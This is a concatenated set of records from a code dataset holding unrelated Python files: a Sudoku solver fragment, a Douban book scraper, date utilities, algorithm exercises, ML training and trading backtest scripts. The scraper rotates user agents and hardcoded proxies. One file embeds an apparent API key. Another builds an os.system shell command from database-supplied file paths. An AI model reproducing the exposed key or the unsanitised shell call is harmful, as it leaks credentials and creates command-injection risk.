((2,1,3,5,4,9,6,8,7),\n (0,0,0,8,0,0,0,0,0),\n (7,9,8,1,5,3,2,6,4),\n (9,5,4,7,8,6,0,0,0),\n (0,0,0,0,6,0,0,0,0), \n (0,0,0,0,0,0,4,0,0),\n (0,0,0,3,0,1,8,5,9),\n (5,4,1,9,3,8,7,2,6),\n (8,7,6,4,9,2,5,1,3))\n\"\"\"\n\n\n\n\n\n# CONSTRAINT: Insert the clues according to their positions in the\n# initial Sudoku instance :\n\ndef run(instance):\n initial_constraint = [ If(instance[i][j] == k+1, S[i][j][k], True)\n for i in range(9) for j in range(9) for k in range(9)]\n \n # list to store all possible solutions\n results=[]\n s = Solver()\n # add our constraints\n s.add( sudoku_constraint + initial_constraint )\n while s.check() == sat:\n m = s.model()\n r = [ [ k+1 for j in range(9) for k in range(9)\n if is_true (m.evaluate(S[i][j][k])) ]\n for i in range(9) ]\n if r not in results:\n results.append (r)\n block = []\n for d in m :\n t = d()\n block.append ( t != m[d] )\n s.add (Or (block))\n# for n in range (len (results)) :\n# print_matrix(results[n])\n# if results == []:\n# print(results)\n return results","sub_path":"frazier_william.hw02/sudoku_in_PL.py","file_name":"sudoku_in_PL.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"580912850","text":"# -*- coding: utf-8 -*-\nimport requests\nimport lxml.html\nimport random\nimport time\nimport pandas as pd\nimport signal\nimport sys\nimport csv\nimport os\nfrom selenium import webdriver\n\n\nhead = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0)',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; ARM; Trident/6.0)'\n ]\n\nproxies = {\n 'http': 'http://121.204.150.97:8118',\n 'http': 'http://116.209.54.142:9999',\n 'http': 'http://180.118.247.29:9000',\n 'http': 'http://125.123.140.211:8118',\n 'http': 'http://218.91.112.182:9999',\n 'http': 'http://117.90.4.255:9000'\n}\ndef exit(signum, frame):\n print('You choose to stop me.')\n sys.exit(0)\n\n\ndef get_books(urls):\n with open(\"./results/books.csv\",\"a+\",encoding=\"utf8\",newline=\"\")as csvfile:\n writer=csv.writer(csvfile)\n if not os.path.exists(\"./results/books.csv\"):\n writer.writerow([\"id\", \"title\", \"book_url\", \"pic_url\", \"author\", \"press\", \"original\", \"translator\",\n \"publish_date\", \"pages\",\"price\",\"binding\", \"ISBN\", \"score\", \"rating_count\", \"summary\",\n \"autor_intro\", \"author_id\", \"tags\", \"comment1\",\"comment2\", \"comment3\",\"comment4\",\n \"comment5\", \"rec_id1\", \"rec_id2\", \"rec_id3\", \"rec_id4\", \"rec_id5\", \"rec_id6\", \"rec_id7\",\n \"rec_id8\",\"rec_id9\", \"rec_id10\"])\n\n total_num=len(urls)\n print(total_num)\n current_num=0\n driver = webdriver.PhantomJS(executable_path=\"./webdriver/phantomjs/bin/phantomjs.exe\")\n\n for url in urls:\n\n current_num+=1\n book_url =url\n\n id=book_url[32:-1]\n\n try:\n driver.get(book_url)\n tar=driver.page_source\n if(len(tar)<1000):\n print(tar)\n sys.exit(0)\n\n except Exception as e:\n print(e)\n print(\"get failed\")\n continue\n tar_html = lxml.html.fromstring(tar)\n # 书名\n try:\n title = tar_html.xpath(\"//span[@property='v:itemreviewed']/text()\")[0]\n except Exception as e:\n print(\"title failed\")\n continue\n # 图片url\n pic_url = tar_html.xpath(\"//a[@class='nbg']/@href\")[0]\n\n # 作者\n print(book_url)\n try:\n author = tar_html.xpath(\"//div[@id='info']/span/a/text()\")[0]\n except Exception as e:\n print(\"author failed\")\n\n continue\n\n\n print()\n #\n # 封面url\n pic_urls=tar_html.xpath(\"//div[@id='mainpic']/a[@class='nbg']/@href\")\n if pic_urls:\n pic_url=pic_urls[0]\n else:\n print(\"pic_url failed\")\n continue\n\n authorids = tar_html.xpath(\"//div[@id='info']/span[1]/a/@href\")\n if authorids:\n author_id=authorids[0]\n else:\n author_id=\"\"\n\n\n #出版社\n presses=tar_html.xpath(\"//text()[preceding-sibling::span[text()='出版社:']][following-sibling::br]\")\n if presses:\n press=presses[0].replace(\"\\n\",\"\").replace(\" \",\"\")\n else:\n press=\"\"\n\n\n\n #原作名\n originals=tar_html.xpath(\"//text()[preceding-sibling::span[text()='原作名:']][following-sibling::br]\")\n if originals:\n original=originals[0].replace(\"\\n\",\"\").replace(\" \",\"\")\n else:\n original=\"\"\n\n\n #译者\n translators = tar_html.xpath(\"//a[parent::span[child::span[text()=' 译者']]]/text()\")\n if translators:\n translator = '/'.join((i.strip() for i in translators))\n else:\n translator = ''\n\n\n #出版年\n publish_dates=tar_html.xpath(\"//text()[preceding-sibling::span[text()='出版年:']][following-sibling::br]\")\n if publish_dates:\n publish_date=publish_dates[0].replace(\"\\n\",\"\").replace(\" \",\"\")\n else:\n publish_date=\"\"\n\n\n\n #页数\n pages = tar_html.xpath(\"//text()[preceding-sibling::span[text()='页数:']][following-sibling::br]\")\n if pages:\n page = pages[0].replace(\"\\n\", \"\").replace(\" \", \"\")\n else:\n page = \"\"\n\n # 定价\n prices = tar_html.xpath(\"//text()[preceding-sibling::span[text()='定价:']][following-sibling::br]\")\n if prices:\n price = prices[0].replace(\"\\n\", \"\").replace(\" \", \"\")\n else:\n price= \"\"\n\n\n #装帧\n bindings = tar_html.xpath(\"//text()[preceding-sibling::span[text()='装帧:']][following-sibling::br]\")\n if bindings:\n binding = bindings[0].replace(\"\\n\", \"\").replace(\" \", \"\")\n else:\n binding = \"\"\n\n\n #ISBN\n ISBNs = tar_html.xpath(\"//text()[preceding-sibling::span[text()='ISBN:']][following-sibling::br]\")\n if ISBNs:\n ISBN = ISBNs[0].replace(\"\\n\", \"\").replace(\" \", \"\")\n else:\n ISBN = \"\"\n\n\n #豆瓣评分\n scores=tar_html.xpath(\"//strong[@property='v:average']/text()\")\n global score\n if scores:\n if scores[0].strip():\n score=scores[0].strip()\n else:\n score=\"\"\n\n\n #评分人数rating_count\n rating_counts=tar_html.xpath(\"//span[@property='v:votes']/text()\")\n if rating_counts:\n if rating_counts[0].strip():\n rating_count=rating_counts[0].strip()\n else:\n rating_count=\"\"\n\n\n #内容简介summary\n summarys=tar_html.xpath(\"//div[@class='intro']\")\n global summary\n if summarys:\n try:\n summary = ''.join(item for item in summarys[0].xpath('p/text()')).replace(',',',').replace(\" \",\"\").replace(\"\\n\",\"\")\n except Exception as e:\n summary=\"\"\n\n #作者简介autro_intro\n if summarys:\n try:\n author_intro = ''.join(item for item in summarys[1].xpath('p/text()')).replace(',',',').replace(\" \",\"\").replace(\"\\n\",\"\")\n except Exception as e:\n author_intro = \"\"\n\n\n #标签\n tag_data=tar_html.xpath(\"//div[@id='db-tags-section']/div/span/a/text()\")\n if tag_data:\n tags=''.join((\" \".join(item for item in tag_data)))\n else:\n tags=\"\"\n\n #评论\n comments=tar_html.xpath(\"//p[@class='comment-content']/span/text()\")\n for i in range(5):\n names = locals()\n try:\n names['comment' + str(i + 1)] = comments[i].replace(',',',').replace(\" \",\"\").replace(\"\\n\",\"\")\n except Exception as e:\n names['comment' + str(i + 1)] = \"\"\n\n\n rec=tar_html.xpath(\"//div[@id='db-rec-section']//dt/a/@href\")\n\n book=[id, title, book_url, pic_url, author, press, original, translator, publish_date, page, price,\n binding, ISBN, score, rating_count, summary, author_intro, author_id,tags]\n\n for i in range(5):\n book.append(names['comment' + str(i + 1)])\n\n for item in rec:\n book.append(item[32:-1])\n\n print(str(current_num)+\"/\"+str(total_num)+\": \"+title)\n if(current_num%50==0):\n driver.quit()\n driver=webdriver.PhantomJS(executable_path=\"./webdriver/phantomjs/bin/phantomjs.exe\")\n try:\n writer.writerow(book)\n except Exception as e:\n print(title+\" write filed.\")\n continue\n\n\n\ndef read_urls():\n tags_col_all = pd.read_csv(\"./results/book_urls.csv\")\n total_num=len(tags_col_all['url'].values.tolist())\n if not os.path.exists(\"./results/books.csv\"):\n return tags_col_all['url'].values.tolist()\n else:\n tags_col_exit=pd.read_csv(\"./results/books.csv\")\n current_num=len(tags_col_exit['book_url'].values.tolist())\n print(\"Having downloaded {0}/{1}\".format(current_num,total_num))\n return list(set(tags_col_all['url'].values.tolist())-set(tags_col_exit['book_url'].values.tolist()))\n\n\n\n\ndef main():\n signal.signal(signal.SIGINT, exit)\n signal.signal(signal.SIGTERM, exit)\n urls = read_urls()\n get_books(urls)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"crawler/download_books_selenium.py","file_name":"download_books_selenium.py","file_ext":"py","file_size_in_byte":9009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"318381179","text":"#!/usr/bin/env python3\n\n\"\"\"\nDirectory : mistool\nName : date_use\nVersion : 2014.08\nAuthor : Christophe BAL\nMail : projetmbc@gmail.com\n\nThis script contains some functions to ease the use pof the standard package\n``datetime``.\n\"\"\"\n\nfrom datetime import datetime, timedelta\n\nfrom mistool.config import date_name\n\n\n# ------------------------- #\n# -- FOR ERRORS TO RAISE -- #\n# ------------------------- #\n\nclass DateUseError(ValueError):\n \"\"\"\nBase class for errors in the ``date_use`` module of the package ``mistool``.\n \"\"\"\n pass\n\n\n# ------------------- #\n# -- SPECIAL DATES -- #\n# ------------------- #\n\nnow = datetime.now\n\n_WEEKDAYS = {\n \"monday\" : 0,\n \"tuesday\" : 1,\n \"wednesday\": 2,\n \"thursday\" : 3,\n \"friday\" : 4,\n \"saturday\" : 5,\n \"sunday\" : 6\n}\n\ndef nextday(\n date,\n name\n):\n \"\"\"\n-----------------\nSmall description\n-----------------\n\nIn some applications, you have a date and you want to find the nearest coming\nday given by its name, for example the next nearest sunday after november the\n30th of the year 2013. You can achieve this using a code like the following\none which will print terminal::``2013-12-01``.\n\npython::\n from datetime import datetime\n\n from mistool import date_use\n\n print(\n date_use.nextday(\n date = datetime.strptime(\"2013-11-30\", \"%Y-%m-%d\"),\n name = \"sunday\",\n ).strftime(\"%Y-%m-%d\")\n )\n\n\ninfo::\n The simple but efficient method used in the code was found in cf::``this\n discussion ; http://stackoverflow.com/a/6558571/1054158``.\n\n\n-------------\nThe arguments\n-------------\n\nThis function uses two variables.\n\n 1) ``date`` is a date defined using the class ``datetime.date`` from the\n standard package ``datetime``.\n\n 2) ``name`` is the english long name of the day wanted.\n \"\"\"\n if name not in _WEEKDAYS:\n raise DateUseError(\"Unknown name << {0} >>.\".format(name))\n\n daysahead = _WEEKDAYS[name] - date.weekday()\n\n if daysahead <= 0:\n daysahead += 7\n\n return date + timedelta(daysahead)\n\n\n# ----------------- #\n# -- TRANSLATING -- #\n# ----------------- #\n\nDEFAULT_LANG = 'en_GB'\nLANGS = date_name.LANGS\n\n_POINTERS = date_name._POINTERS\n_FORMATS_TRANSLATIONS = date_name._FORMATS_TRANSLATIONS\n\ndef translate(\n date,\n format,\n lang = DEFAULT_LANG\n):\n \"\"\"\n-----------------\nSmall description\n-----------------\n\nThe aim of this function is to avoid the use of something like in the following\ncode (the documentation of the standard package ``locale`` avoids to do that kind\nof things).\n\npython::\n import locale\n import datetime\n\n locale.setlocale(locale.LC_ALL, 'fr_FR')\n print (datetime.date(2013, 9, 21).strftime(\"%A %d %B %Y\"))\n\nThis code prints the text terminal::``Samedi 29 septembre 2013`` in a terminal.\nThis can be achieved using the function ``translate`` like in the following code.\n\npython::\n from datetime import date\n\n from mistool import date_use\n\n print(\n date_use.translate(\n date = date(2013, 9, 21),\n format = \"%A %d %B %Y\",\n lang = \"fr_FR\"\n )\n )\n\n\nIf you always want to use the same language, you can do it like this.\n\npython::\n import datetime\n\n from mistool import date_use\n\n date_use.LANG = 'fr_FR'\n\n print(\n date_use.translate(\n date = datetime.date(2013, 9, 21),\n format = \"%A %d %B %Y\"\n )\n )\n\n\ninfo::\n The mechanism used in backstage is very primitive : it never calls the\n standard package ``locale`` !\n\n\n-------------\nThe arguments\n-------------\n\nThis function uses three variables.\n\n 1) ``date`` is a date defined using the class ``datetime.date`` from the\n standard package ``datetime``.\n\n 2) ``format`` is a string that uses the special formatters available with\n the method ``strftime`` of the class ``datetime.date``.\n\n 3) ``lang`` is a language respecting the convention needed for the use of\n the function ``locale.setlocale`` of the standard package ``locale``.\n\n This optional variable used the default value ``DEFAULT_LANG`` which is a\n module constant defined by ``DEFAULT_LANG = \"en_GB\"``.\n\"\"\"\n if lang not in LANGS:\n raise DateUseError(\n 'Illegal value << {0} >> for the argument ``lang``.'.format(lang)\n )\n\n nbday = date.weekday()\n nbmonth = date.month - 1\n\n for oneformat in ['%a', '%A']:\n if oneformat in format:\n dayname = _POINTERS[\n _FORMATS_TRANSLATIONS[oneformat][lang]\n ][nbday]\n\n format = format.replace(oneformat, dayname)\n\n for oneformat in ['%b', '%B']:\n if oneformat in format:\n monthname = _POINTERS[\n _FORMATS_TRANSLATIONS[oneformat][lang]\n ][nbmonth]\n\n format = format.replace(oneformat, monthname)\n\n return date.strftime(format)\n","sub_path":"mistool/date_use.py","file_name":"date_use.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282350813","text":"import re\nimport json\nimport utm\n\nfile = open('raw.txt','r').read().splitlines()\n\nitems = []\n\nfor line in file:\n match = re.findall(r\"^(.*?)\\°,(.*?)\\°,([a-zA-Z\\s]+)$\",line)\n if(len(match) == 1):\n vara = (utm.from_latlon(float(match[0][0]), float(match[0][1])))\n x = vara[0] \n y = vara[1] \n items.append({\n 'x':float(x),\n 'y':float(y),\n 'long':match[0][0],\n 'lat':match[0][1],\n 'name':str(match[0][2]),\n })\n\nprint(json.dumps(items))","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429512411","text":"from collections import deque\ndef bfs():\n Q.append((px,py,0))\n visit[px][py]=1\n while Q:\n x,y,z=Q.popleft()\n for i in range(4):\n tx=x+dx[i]\n ty=y+dy[i]\n if tx<0 or tx>=h or ty<0 or ty>=w:\n if z==1:continue\n return visit[x][y]\n if visit[tx][ty] or building[tx][ty]=='#':continue\n visit[tx][ty]=visit[x][y]+1\n Q.append((tx,ty,z))\n return 'IMPOSSIBLE'\ndx=[-1,1,0,0]\ndy=[0,0,-1,1]\nfor T in range(int(input())):\n w,h=map(int,input().split())\n building=[list(input()) for _ in range(h)]\n visit=[[0]*w for _ in range(h)]\n Q=deque()\n px=py=0\n for i in range(h):\n for j in range(w):\n if building[i][j]=='*':\n Q.append((i,j,1))\n visit[i][j]=1\n elif building[i][j]=='@':\n px,py=i,j\n building[i][j]='.'\n print(bfs())","sub_path":"BOJ/2020_04_03/BOJ_5427_불.py","file_name":"BOJ_5427_불.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227291195","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Codec:\n\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\n \"\"\"\n \n # Need to construct the string in such a way that\n # string gets added from left to right, by left\n # Iterative BFS on tree\n \n # Queue algorithm (if root is null, return \"\" before all this)\n # BFS but for trees\n # 1. enqueue the root\n # 2. While queue not empty\n # a. dequeue front\n # b. convertv value to string and append to string to be returned\n # c. If node.left is not null, enqueue to the back\n # d. If node.right is not null, enqueue to the back\n # 3. Return\n \n if not root:\n return \"\"\n \n from collections import deque\n \n answer = \"\"\n queue = deque([])\n queue.append(root)\n \n while queue:\n node = queue.popleft()\n answer += str(node.val) + ' ' # ' ' is the delimiter\n \n if node.left:\n queue.append(node.left)\n \n if node.right:\n queue.append(node.right)\n\n # we don't want delimiter at the end of the string\n return answer[:-1]\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\n \"\"\"\n \n # Basically run insert into a binary tree\n if not data:\n return None\n \n # split data into a list of strings\n data = data.split(\" \")\n root = TreeNode(int(data[0]))\n \n def insert(node, value):\n \n if not node:\n return TreeNode(value)\n \n if node.val <= value:\n node.right = insert(node.right, value)\n else:\n node.left = insert(node.left, value)\n \n return node\n \n # for each string, run insert\n for i in range(1, len(data)):\n root = insert(root,int(data[i]))\n\n return root\n \n\n# Your Codec object will be instantiated and called as such:\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# tree = ser.serialize(root)\n# ans = deser.deserialize(tree)\n# return ans\n\n# Your Codec object will be instantiated and called as such:\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# tree = ser.serialize(root)\n# ans = deser.deserialize(tree)\n# return ans\n","sub_path":"Python/Serialize_and_Deserialize_BST.py","file_name":"Serialize_and_Deserialize_BST.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"364697508","text":"import tensorflow as tf\nimport numpy as np\n\nfrom read_data import *\nfrom model_tensorflow import *\nfrom model_tensorflow_attn import *\nimport time\nimport os\n\n\nATTN = True\nDICT_BOUND = 3\nEPOCHS = 2000\nlearning_rate=1e-3\nMAX_LENGTH = 15\nres_path = './result/' \n\n\nif __name__ == '__main__':\n\t###=======================================================\n\t### Import data\n\t###=======================================================\n\ttrain_label = get_train_label()\n\tenglish = readLangs(train_label)\n\tenglish = get_spe_dict(english, DICT_BOUND)\n\tprint('total words numbers: ', english.n_words)\n\n\tid2index = id_index(train_label)\n\ttrain_id = get_train_id()\n\ttrain_feature, train_caption, pick_ids = get_train_batch(train_id, train_label, \n\t\tid2index, english, size=5, max_len=15)\n\tprint('='*80)\n\tprint(train_feature.shape)\n\tprint(train_caption.shape)\n\n\tif ATTN:\n\t\tmodel = Videl_Caption_Generator_ATTN(n_encoder_input=4096, n_hidden=256, n_decoder_input=english.n_words, n_embed=500)\n\t\tsaver = tf.train.Saver()\n\t\ttry:\n\t\t\tsaver.restore(model.sess, save_path=res_path+'model')\n\t\t\tprint('Reload succussfully(ATTN)')\n\t\texcept:\n\t\t\tprint('Start training new model(ATTN)')\t\n\telse:\n\t\tmodel = Videl_Caption_Generator(n_encoder_input=4096, n_hidden=256, n_decoder_input=english.n_words, n_embed=500)\n\t\tsaver = tf.train.Saver()\n\t\ttry:\n\t\t\tsaver.restore(model.sess, save_path=res_path+'model')\n\t\t\tprint('Reload succussfully')\n\t\texcept:\n\t\t\tprint('Start training new model')\t\n\n\tif not os.path.exists(res_path):\n\t\tos.mkdir(res_path)\n\n\tstart = time.time()\n\tfor iter in range(EPOCHS):\n\t\tstart_single = time.time()\n\t\ttrain_feature, train_caption, pick_ids = get_train_batch(train_id, train_label, id2index, english, size=5, max_len=15)\n\t\tloss, output = model.train(train_feature, train_caption)\n\n\t\tif iter%5 == 0:\n\t\t\tend_single = time.time()\n\t\t\tcost = end_single - start\n\t\t\tcost_m = cost // 60\n\t\t\tcost_s = cost % 60\n\n\t\t\tprint('='*100)\n\t\t\tprint('iter: %d/%d | loss: %.2f | cost: %dmin%ds' % (iter, EPOCHS, loss, cost_m, cost_s))\n\t\t\tprint('example id: ', pick_ids[0])\n\t\t\tprint('predict example:')\n\t\t\tprint(vec2seq(output[0], english))\n\t\t\tprint('ground truth:')\n\t\t\tprint(vec2seq(train_caption[0], english))\n\n\t\t\tsaver.save(model.sess, save_path=res_path+'model')\n\t\t\tprint('Model Save Successfully~')\n\n\n","sub_path":"tensorflow/Seq2Seq/tensorflow-vedio-caption/train_tensorflow.py","file_name":"train_tensorflow.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"566635767","text":"'''\nplot-optimize-over-time.py\n\nDetermines how optimal paramters move over\ntime\n\nWritten by Dennis Cahillane\nSeptember 28, 2020\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport argparse\nfrom itertools import product\nfrom prism_strategy import PrismStrategy\nfrom html_service import HTMLService\n\nmpl.rcParams.update({'figure.figsize':(14,9),\n 'text.usetex': False,\n 'font.family': 'serif',\n 'lines.linewidth': 2.5,\n 'font.size': 14,\n 'xtick.labelsize': 'large',\n 'ytick.labelsize': 'large',\n 'legend.fancybox': True,\n 'legend.fontsize': 14,\n 'legend.framealpha': 0.7,\n 'legend.handletextpad': 0.5,\n 'legend.labelspacing': 0.2,\n 'legend.loc': 'best',\n 'savefig.dpi': 80,\n 'pdf.compression': 9})\n\nbitcoin_csv = 'price-history/Bitcoin Data __ 30-Min __ Bitmex (XBTUSD) - ALL.csv'\nraw = pd.read_csv(bitcoin_csv, comment='#', sep=',', index_col=0, parse_dates=True)\n\nsource = 'close'\nresults = pd.DataFrame()\n\ninterval = 5\nclose_slow_length_range = range(20, 96, interval)\nclose_fast_length_range = range(5, 66, interval)\n\nparameter_view = pd.DataFrame()\nparameter_view = parameter_view.reindex(columns = close_slow_length_range)\nparameter_view = parameter_view.reindex(parameter_view.index.tolist() + list(close_fast_length_range))\nyears = range(2018, 2021)\nmonths = range(1, 13)\nfor year in years:\n for month in months:\n end_date = f'{year}-{month}-01'\n subset = raw.loc['2017-01-01':end_date]\n for close_fast_length in close_fast_length_range:\n for close_slow_length in range(max(20, close_fast_length + interval), 96, interval):\n prism_strategy = PrismStrategy(close_fast_length = close_fast_length, close_slow_length = close_slow_length)\n perf, data = prism_strategy.backtest(subset, source)\n ratio = round(perf[1]/perf[0], 2)\n parameter_view.at[close_fast_length, close_slow_length] = ratio\n\n results = results.append(pd.DataFrame(\n {'close_fast_length': close_fast_length,\n 'close_slow_length': close_slow_length,\n 'market': perf['Returns'],\n 'strategy': perf['Strategy'],\n 'outperform': perf['Strategy'] - perf['Returns']},\n index=[0]), ignore_index=True)\n\n fig = plt.figure()\n ax = plt.gca()\n im = ax.matshow(parameter_view)\n cbar = fig.colorbar(im)\n\n ax.xaxis.set_ticks_position('bottom')\n ax.set_xticks(np.arange(len(close_slow_length_range)))\n ax.set_xticklabels(close_slow_length_range)\n ax.set_yticks(np.arange(len(close_fast_length_range)))\n ax.set_yticklabels(close_fast_length_range)\n\n end_date_str = subset.last_valid_index().date().strftime(\"%Y-%m-%d\")\n ax.set_title(f\"Performance until {end_date_str}\", fontsize=24)\n ax.set_xlabel('SMA (slow)')\n ax.set_ylabel('SMA (fast)')\n\n #plt.show()\n plt.savefig(f'animation/until-{end_date_str}.png', bbox_inches='tight')\n plt.close()\n","sub_path":"plot-optimize-over-time.py","file_name":"plot-optimize-over-time.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"318433773","text":"# -*- coding: UTF-8 -*-\n\"\"\"Refactoring.\n\nThis exercise contains a complete and working example, but it's very poorly written.\n\nYour job is to go through it and make it as good as you can.\n\nThat means making it self-documenting wherever possible, adding comments where\nit isn't. Take repeated code and make it into a function. Also use functions\nto encapsulate concepts. If something is done many times, maybe a map or a loop\nis called for. Etc.\n\nSome functions will have directions as external comments, once you think you\nare on top of it, take these comments out. Others won't have comments and\nyou'll need to figure out for yourself what to do.\n\"\"\"\nimport math\n\n# return a list of countdown messages, much like in the bad function above.\n# It should say something different in the last message.\ndef countdown(message, start, stop, completion_message):\n countdown = []\n for i in range(start,stop-1,-1):\n print(message + \" \" + str(i))\n countdown.append(message + \" \" + str(i))\n print(completion_message)\n countdown.append(completion_message)\n return countdown\n\n# TRIANGLES\n\n# This should be a series of functions that are ultimatly used by\n# triangle_master\n# It should eventually return a dictionary of triangle facts. It should\n# optionally print information as a nicely formatted string. Make printing\n# turned off by default but turned on with an optional argument.\n# The stub functions are made for you, and each one is tested, so this should\n# hand hold quite nicely.\ndef calculate_hypotenuse(base, height):\n hyp = math.sqrt(base ** 2 + height ** 2)\n #print(\"Calculalte hyp: base, height = \" + str(base) + \" \" + str(height) + \" \" + str(hyp))\n return hyp\n\n\ndef calculate_area(base, height):\n area = 0.5 * (base * height)\n #print(\"area = \" + str((base * height) / 2))\n return area\n\n\ndef calculate_perimeter(base, height):\n hyp = calculate_hypotenuse(base, height)\n perimeter = base + height + hyp\n return perimeter\n\n\ndef calculate_aspect(base, height):\n #c = calculate_hypotenuse(base, height)\n #s = 0.5 * (base + height + c)\n #aspect = (base * height * c) / ((8) * (s - base) * (s - height) * (s - c))\n if (base == height):\n return \"equal\"\n elif ( base < height):\n return \"tall\"\n else:\n return \"wide\"\n\n\n# Make sure you reuse the functions you've already got\n# Don't reinvent the wheel\ndef get_triangle_facts(base, height, units=\"mm\"):\n return {\n \"area\": calculate_area(base, height),\n \"perimeter\": calculate_perimeter(base, height),\n \"height\": height,\n \"base\": base,\n \"hypotenuse\": calculate_hypotenuse(base, height),\n \"aspect\": calculate_aspect(base, height),\n \"units\": units,\n }\n\n\n# this should return a multi line string that looks a bit like this:\n#\n# 15\n# |\n# | |\\\n# |____>| \\ 17.0\n# | \\\n# | \\\n# ------\n# 8\n# This triangle is 60.0mm²\n# It has a perimeter of 40.0mm\n# This is a tall triangle.\n#\n# but with the values and shape that relate to the specific\n# triangle we care about.\ndef tell_me_about_this_right_triangle(facts_dictionary):\n tall = \"\"\"\n {height}\n |\n | |\\\\\n |____>| \\\\ {hypotenuse}\n | \\\\\n | \\\\\n ------\n {base}\"\"\"\n wide = \"\"\"\n {hypotenuse}\n ↓ ∕ |\n ∕ | <-{height}\n ∕ |\n ∕------------|\n {base}\"\"\"\n equal = \"\"\"\n {height}\n |\n | |⋱\n |____>| ⋱ <-{hypotenuse}\n |____⋱\n {base}\"\"\"\n\n b = facts_dictionary.get(\"base\")\n h = facts_dictionary.get(\"height\")\n text = \"\"\n aspect = \"\"\n if (b == h):\n text = equal\n aspect = \"equal\"\n elif ( b < h):\n text = tall\n aspect = \"tall\"\n else:\n text = wide\n aspect = \"wide\"\n\n pattern = (\n \"This triangle is {area}{units}²\\n\"\n \"It has a perimeter of {perimeter}{units}\\n\"\n \"This is a \" + aspect + \" triangle.\\n\"\n )\n\n facts = text.format(**facts_dictionary) + \"\\n\" + pattern.format(**facts_dictionary)\n return facts\n\n\ndef triangle_master(base, height, return_diagram=False, return_dictionary=False):\n if return_diagram and return_dictionary:\n return {\"diagram\": tell_me_about_this_right_triangle(get_triangle_facts(base, height, units=\"mm\")), \"facts\": get_triangle_facts(base, height, units=\"mm\")}\n elif return_diagram:\n return tell_me_about_this_right_triangle(get_triangle_facts(base, height, units=\"mm\"))\n elif return_dictionary:\n return get_triangle_facts(base, height, units=\"mm\")\n else:\n print(\"You're an odd one, you don't want anything!\")\n\ndef wordy_pyramid(api_key):\n import requests\n \n pyramid_list = []\n for i in range(3, 21, 2):\n word = get_a_word_of_length_n(i)\n pyramid_list.append(word)\n for i in range(20, 3, -2):\n word = get_a_word_of_length_n(i)\n pyramid_list.append(word)\n return pyramid_list\n\n\ndef get_a_word_of_length_n(length):\n import requests\n baseURL = (\n \"https://us-central1-waldenpondpress.cloudfunctions.net/give_me_a_word?\"\n \"wordlength={length}\" \n # \"http://api.wordnik.com/v4/words.json/randomWords?\"\n # \"api_key=n8o442zwoedg02xlpw8bqb0d9zz2sqz6nl03g4otebnjabpew\"\n # \"&minLength={length}\"\n # \"&maxLength={length}\"\n #\"&limit=1\"\n )\n \n url = baseURL.format(length=length)\n r = requests.get(url)\n if r.status_code is 200:\n return r.text\n else:\n print(\"failed a request\", r.status_code, length)\n\n\ndef list_of_words_with_lengths(list_of_lengths): \n word_list = []\n for i in list_of_lengths:\n word = get_a_word_of_length_n(i)\n word_list.append(word)\n return word_list\n\nif __name__ == \"__main__\":\n #do_bunch_of_bad_things()\n wlist = wordy_pyramid(\"n8o442zwoedg02xlpw8bqb0d9zz2sqz6nl03g4otebnjabpew\")\n for word in wlist:\n print(word)\n\n","sub_path":"week5/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"245666267","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os \r\nimport database_connect\r\n\r\ndatabase_rowcount = database_connect.row_count()\r\n\r\nwhile True:\r\n if database_connect.row_count() <= database_rowcount:\r\n continue\r\n\r\n print(\"new data\")\r\n database_rowcount = database_connect.row_count()\r\n video_path, video_id, video_date = database_connect.new_video_id()\r\n video_path = \"/home/data/uploads/\" + video_path\r\n print(video_path)\r\n print(video_date)\r\n print(video_id)\r\n \r\n openpose_output_path = \"/home/json_out/json\" + str(video_id)\r\n print(openpose_output_path)\r\n \r\n os.chdir(\"../../openpose\")\r\n os.system(\"./build/examples/openpose/openpose.bin --video \" + video_path + \" --write_json \" + openpose_output_path + \" --render_pose 0 --display 0 --hand\")\r\n os.chdir(\"../baspose/src\")\r\n os.system(\"python3 test1.py\")\r\n","sub_path":"src/combine3.py","file_name":"combine3.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"13845339","text":"# Followed https://kivy.org/docs/tutorials/pong.html\nfrom random import randint\n\nimport kivy\nfrom kivy.app import App\nfrom kivy.logger import Logger\nfrom kivy.properties import NumericProperty, 